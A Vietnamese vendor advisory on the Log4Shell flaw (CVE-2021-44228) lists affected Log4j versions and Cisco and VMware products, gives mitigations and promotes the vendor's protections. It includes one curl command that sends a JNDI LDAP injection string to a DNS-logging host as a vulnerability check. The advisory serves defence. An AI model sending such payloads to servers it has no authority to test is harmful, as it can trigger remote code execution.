CẢNH BÁO: Lỗ hổng 0-day trong thư viện Log4j trên Java (Log4Shell: RCE 0-day)

Với mức độ khai thác của lỗ hổng cho phép Thực thi mã từ xa (RCE) thì lỗ hổng này rất nghiêm trọng. Nó ảnh hưởng đến nhiều hệ thống trên internet được phát triển từ Java và được đánh giá sẽ phạm vi ảnh hưởng rộng như lỗ hổng ShellShock và Heartbleed trước kia.

Các giải pháp công ty Misoft phân phối đã đều có signature và cách thức để ngăn chặn khai thác lỗ hổng này:
- Với giải pháp của Imperva, khách hàng có thể hoàn toàn yên tâm vì hãng đã có phương án bảo vệ;
- Bản update từ hãng CheckPoint vào ngày 09/12/2021;
- Đã có rule trên giải pháp Trend Micro Cloud One (Workload Security and Deep Security IPS Rules), và sẽ có trên Trend Micro Cloud One - Network Security and TippingPoint DVToolkit CSW file CVE-2021-44228 vào 14/12/2021.

THÔNG TIN CỤ THỂ:
1.Lỗ hổng 0-day trong thư viện Log4j trên Java (Log4Shell: RCE 0-day)
 • Mã lỗ hổng bảo mật: CVE-2021-44228
 • Mô tả: Thư viện log4j là 1 thư viện dùng để ghi log phổ biến trong Java hầu hết các ứng dụng phát triển Java đều sử dụng đến thư viện này. Với mức độ khai thác của lỗ hổng cho phép RCE thì lỗ hổng này rất nghiêm trọng ảnh hưởng bảo mật đến nhiều hệ thống trên internet được phát triển từ Java. Được đánh giá sẽ phạm vi ảnh hưởng rộng như lỗ hổng ShellShock và Heartbleed trước kia.
Sơ đồ mô tả luồng tấn công
 • Hệ thống bị ảnh hưởng: 
  • Phần lớn các dịch vụ phát triển bằng Java sử dụng log4j sẽ bị ảnh hưởng như dịch vụ đám mây như Steam, Apple iCloud và các ứng dụng như Minecraft đã được phát hiện là đã có lỗ hổng.
  • Phiên bản Apache log4j có lỗ hổng đó là 2.0 <= Apache log4j <= 2.14.1.
  • Phạm vi ảnh hưởng là rất lớn. Ví dụ:
   • Apache Struts, Apache Flink, Apache Druid, Apache Flume, Apache Solr, Apache Flink, Apache Kafka, Apache Dubbo, …
   • Redis, ElasticSearch, Elastic Logstash
   • Vmware (VMSA-2021-0028 bao gồm VMware vCenter Server và nhiều sản phẩm khác. Chi tiết ở phần Tham khảo)
   • Chúng tôi sẽ tiếp tục cập nhật các hệ thốnh bị ảnh hưởng.
 • Cách định máy chủ có tồn tại điểm yếu: Sử dụng DNS logger (chẳng hạn như dnslog.cn ), có thể tạo tên miền và sử dụng tên miền này trong payloads thử nghiệm của mình (lưu ý tùy chỉnh thông tin):
  • curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://xxx.dnslog.cn/a}'
2. Khuyến nghị khắc phục
 1. Tăng cường giám sát, phát hiện kịp thời các cuộc  tấn công khai thác lỗ hổng.
 2. Cập nhật các thiết bị bảo vệ để ngăn chặn việc khai thác lỗ hổng (nếu có).
 3. Cách khắc phục:
 • Khắc phục tạm thời:
  • Cấu hình thêm rule ở WAF để chặn khai thác lỗ hổng (VD: Chặn tham số jndi,… tham khảo mẫu rule phát hiện tấn công ở mục Tham khảo)
  • Nếu đang sử dụng phiê bả 2.10.0 trở lên và không thể nâng cấp, có thể cấu hình: log4j2.formatMsgNoLookups=true
  • Nếu đang sử dụng phiên bản cũ hơn 2.10.0 và không thể nâng cấp, các lựa chọn giảm thiểu là:
   • Sửa đổi logging pattern layout để % m {nolookups} thay vì % m trong tệp cấu hình ghi nhật ký của bạn, xem chi tiết tại [https://issues.apache.org/jira/browse/LOG4J2-2109] ( https://issues.apache.org/jira/browse/LOG4J2-2109).
  • Thay thế class org.apache.logging.log4j.core.lookup.JndiLookup bằng class trống hoặc class cũ không có lỗi, theo cách mà trình classloader nạp lớp của bạn sử dụng thay thế của bạn thay vì phiên bản dễ bị tấn công của class. Tham khảo tài liệu tải lớp của ứng dụng hoặc ngăn xếp của bạn để hiểu hành vi này.
3. Tham khảo
https://logging.apache.org/log4j/2.x/security.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/
https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java
https://www.vmware.com/security/advisories/VMSA-2021-0028.html
https://www.checkpoint.com/defense/advisories/public/2021/cpai-2021-0936.html

https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html
Mẫu rule phát hiện tấn công https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b


Danh sách các giải pháp ảnh hưởng (Đang tiếp tục cập nhật):

Apache 
Broadcom (Including CA & Symantec) 
The current list can be found in the advisory.


Cisco 
The current list can be found in the advisory.
Collaboration and Social Media

 • Cisco Webex Meetings Server
Network and Content Security Devices
 • Cisco Advanced Web Security Reporting Application
 • Cisco Identity Services Engine (ISE)
 • Cisco Registered Envelope Service
Network Management and Provisioning
 • Cisco CloudCenter Suite Admin
 • Cisco Crosswork Change Automation
 • Cisco Evolved Programmable Network Manager
 • Cisco Integrated Management Controller (IMC) Supervisor
 • Cisco Intersight Virtual Appliance
 • Cisco Network Services Orchestrator (NSO)
 • Cisco Nexus Dashboard (formerly Cisco Application Services Engine)
 • Cisco WAN Automation Engine (WAE)
Routing and Switching - Enterprise and Service Provider
 • Cisco SD-WAN vManage
Unified Computing
 • Cisco UCS Director
Voice and Unified Communications Devices
 • Cisco BroadCloud
 • Cisco Computer Telephony Integration Object Server (CTIOS)
 • Cisco Packaged Contact Center Enterprise
 • Cisco Unified Contact Center Enterprise - Live Data server
 • Cisco Unified Contact Center Enterprise
 • Cisco Unified Intelligent Contact Management Enterprise
 • Cisco Unified SIP Proxy Software
Video, Streaming, TelePresence, and Transcoding Devices
 • Cisco Video Surveillance Operations Manager
Cisco Cloud Hosted Services
 • Cisco DNA Spaces
 • Cisco Kinetic for Cities
 • Cisco Umbrella
 • Cisco Unified Communications Manager Cloud
 • Cisco Webex Cloud-Connected UC (CCUC)
 • Managed Services Accelerator (MSX) Network Access Control Service
 • CloudLock
 • Duo
 • ThousandEyes
Others
 • Cisco Common Services Platform Collector (CSPC)
Many other products are still under investigation.
Elastic 
Elastic has confirmed the vulnerability, but believes their mitigations make it difficult to exploit.

HCL 
See the KB entries matching CVE-2021-44228 for additional details.

VMware 
The current list can be found in the advisory.

 • API Portal for VMware Tanzu
 • App Metrics
 • Healthwatch for Tanzu Application Service
 • Single Sign-On for VMware Tanzu Application Service
 • Spring Cloud Gateway for Kubernetes
 • Spring Cloud Gateway for VMware Tanzu
 • Spring Cloud Services for VMware Tanzu
 • VMware Carbon Black Cloud Workload Appliance
 • VMware Carbon Black EDR Servers
 • VMware Cloud Foundation
 • VMware HCX
 • VMware Horizon
 • VMware Identity Manager
 • VMware NSX-T Data Center
 • VMware Site Recovery Manager
 • VMware Tanzu Application Service for VMs
 • VMware Tanzu GemFire
 • VMware Tanzu Greenplum
 • VMware Tanzu Kubernetes Grid Integrated Edition
 • VMware Tanzu Observability by Wavefront Nozzle
 • VMware Tanzu Operations Manager
 • VMware Tanzu SQL with MySQL for VMs
 • VMware Telco Cloud Automation
 • VMware Unified Access Gateway
 • VMware vCenter Cloud Gateway
 • VMware vCenter Server
 • VMware vRealize Automation
 • VMware vRealize Lifecycle Manager
 • VMware vRealize Log Insight
 • VMware vRealize Operations
 • VMware vRealize Operations Cloud Proxy
 • VMware vRealize Orchestrator
 • VMware WorkspaceOne Access
Others 
Potentially affected products